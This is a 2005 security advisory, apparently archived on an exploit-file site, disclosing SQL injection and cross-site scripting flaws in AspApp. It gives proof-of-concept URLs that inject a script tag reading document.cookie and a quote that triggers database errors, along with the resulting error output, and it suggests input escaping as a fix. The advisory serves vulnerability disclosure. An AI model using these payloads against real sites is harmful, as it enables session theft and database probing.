AspApp.txt

AspApp.txt: Posted Mar 29, 2005; Authored by Diabolic Crab | Site hackerscenter.com; Multiple SQL injection and cross site scripting vulnerabilities have been discovered in AspApp. Sample exploitation provided.; tags | exploit, vulnerability, xss, sql injection; SHA-256 | 03e90c2cb4195bc7bc382495197baedd3e0d909a18bcfb755d1062bb38afca07; Download | Favorite | View

AspApp.txt

This is a multi-part message in MIME format.

------=_NextPart_000_0055_01C53454.CDDA4C20
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity:  Medium
Title: Multiple sql injection, and xss vulnerabilities in AspApp.
Date: March  30,  2005
Vendor: AspApp
Vendor site: http://www.localhost

Summary:
There are multiple sql injection, xss vulnerabilities in the AspApp.

Proof of Concept Exploits:

http://localhost/content.asp?CatId=3D109&ContentType=3D%22%3E%3Cscript%3E=
alert(document.cookie)%3C/script%3E
Pops cookie

http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3DCompany
Sql error
Microsoft VBScript runtime  error '800a000d'

Type mismatch: 'cLng'

C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line
341


http://localhost/content.asp?ContentId=3D'SQL_ERROR
Sql error
Microsoft VBScript runtime  error '800a000d'

Type mismatch: 'cLng'

C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line
341


http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume=
nt.cookie)%3C/script%3E
Pops cookie

Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.

Author:
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQkjyNiZV5e8av/DUEQKRLwCgpmrJ/ocvgm71sGxdIbAeOSeetRYAoOVm
/jk6eYh8KsXpcrRKoGioBL3w
=3D2em+
-----END PGP SIGNATURE-----

------=_NextPart_000_0055_01C53454.CDDA4C20
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity:&nbsp; Medium<BR>Title: =
Multiple sql=20
injection, and xss vulnerabilities in AspApp.<BR>Date: March&nbsp; =
30,&nbsp;=20
2005<BR>Vendor: AspApp<BR>Vendor site: <A=20
href=3D"http://www.localhost">http://www.localhost</A></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Summary:<BR>There are multiple sql =
injection, xss=20
vulnerabilities in the AspApp.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://localhost/content.asp?CatId=3D109&ContentType=3D%22%3E=
%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/content=
.asp?CatId=3D109&ContentType=3D%22%3E%3Cscript%3Ealert(document.cooki=
e)%3C/script%3E</A><BR>Pops=20
cookie</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3D=
Company">http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3D=
Company</A><BR>Sql=20
error</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Microsoft VBScript runtime&nbsp; error=20
'800a000d'</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Type mismatch: 'cLng'</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial=20
size=3D2>C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, =

line<BR>341</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV><FONT face=3DArial =
size=3D2>
<DIV><BR><A=20
href=3D"http://localhost/content.asp?ContentId=3D'SQL_ERROR">http://local=
host/content.asp?ContentId=3D'SQL_ERROR</A><BR>Sql=20
error<BR>Microsoft VBScript runtime&nbsp; error '800a000d'</DIV>
<DIV>&nbsp;</DIV>
<DIV>Type mismatch: 'cLng'</DIV>
<DIV>&nbsp;</DIV>
<DIV>C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp,=20
line<BR>341</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealer=
t(document.cookie)%3C/script%3E">http://localhost/content.asp?contenttype=
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV>Possible fix: The usage of =
htmlspeacialchars(),&nbsp;mysql_escape_string(),=20
mysql_real_escape_string() and other functions for input validation =
before=20
passing&nbsp;user input to the mysql database, or before echoing data on =
the=20
screen, would solve these problems.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Author:<BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel =
free=20
to&nbsp;contact me regarding these vulnerabilities. You can find me at, =
<A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with php.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>iQA/AwUBQkjyNiZV5e8av/DUEQKRLwCgpmrJ/ocvgm71sGxdIbAeOSeetRYAoOVm<BR>=
/jk6eYh8KsXpcrRKoGioBL3w<BR>=3D2em+<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>

------=_NextPart_000_0055_01C53454.CDDA4C20--

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

AspApp.txt

AspApp.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

AspApp.txt

Share This

AspApp.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems